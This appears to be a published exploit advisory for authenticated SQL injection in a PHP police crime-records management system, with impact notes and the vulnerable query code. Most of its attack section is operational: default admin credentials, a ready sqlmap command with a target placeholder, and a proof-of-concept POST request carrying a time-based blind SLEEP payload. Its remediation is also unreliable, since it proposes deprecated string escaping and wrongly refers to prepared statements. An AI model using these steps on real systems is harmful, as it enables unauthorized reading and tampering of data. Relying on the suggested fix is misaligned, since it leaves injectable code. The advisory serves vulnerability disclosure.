# Exploit Title: Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated) # Date: 17/08/2021 # Exploit Author: Davide 't0rt3ll1n0' Taraschi # Vendor Homepage: https://www.sourcecodester.com/users/osman-yahaya # Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html # Version: 1.0 # Testeted on: Linux (Ubuntu 20.04) using LAMPP ## Impact: An authenticated user may be able to read data for which is not authorized, tamper with or destroy data, or possibly even read/write files or execute code on the database server. ## Description: All four parameters passed via POST are vulnerable: `fname` is vulnerable both to boolean-based blind and time-based blind SQLi `oname` is vulnerable both to boolean-based blind and time-based blind SQLi `username` is only vulnerable to time-based blind SQLi `status` is vulnerable both to boolean-based blind and time-based blind SQLi ## Remediation: Here is the vulnerable code: if($status==''){ mysqli_query($dbcon,"update userlogin set surname='$fname', othernames='$oname' where staffid='$staffid'")or die(mysqli_error()); } if(!empty($status)){ mysqli_query($dbcon,"update userlogin set surname='$fname',status='$status', othernames='$oname' where staffid='$staffid'")or die(mysqli_error()); } As you can see the parameters described above are passed to the code without being checked, this lead to the SQLi. To patch this vulnerability, i suggest to sanitize those variables via `mysql_real_escape_string()` before being passed to the prepared statement. ## Exploitation through sqlmap 1) Log into the application (you can try the default creds 1111:admin123) 2) Copy your PHPSESSID cookie 3) Launch the following command: sqlmap --method POST -u http://$target/ghpolice/admin/savestaffedit.php --data="fname=&oname=&username=&status=" --batch --dbs --cookie="PHPSESSID=$phpsessid" replacing $target with your actual target and $phpsessid with the cookie that you had copied before ## PoC: Request: POST /ghpolice/admin/savestaffedit.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 77 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/ghpolice/admin/user.php Cookie: PHPSESSID=f7123ac759cd97868df0f363434c423f Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 fname=' AND (SELECT * FROM (SELECT(SLEEP(5)))foo)-- &oname=&username=&status= And after 5 seconds we got: HTTP/1.1 200 OK Date: Tue, 17 Aug 2021 14:28:59 GMT Server: Apache/2.4.48 (Unix) OpenSSL/1.1.1k PHP/7.4.22 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.4.22 Content-Length: 1074 Connection: close Content-Type: text/html; charset=UTF-8 <!DOCTYPE html> etc...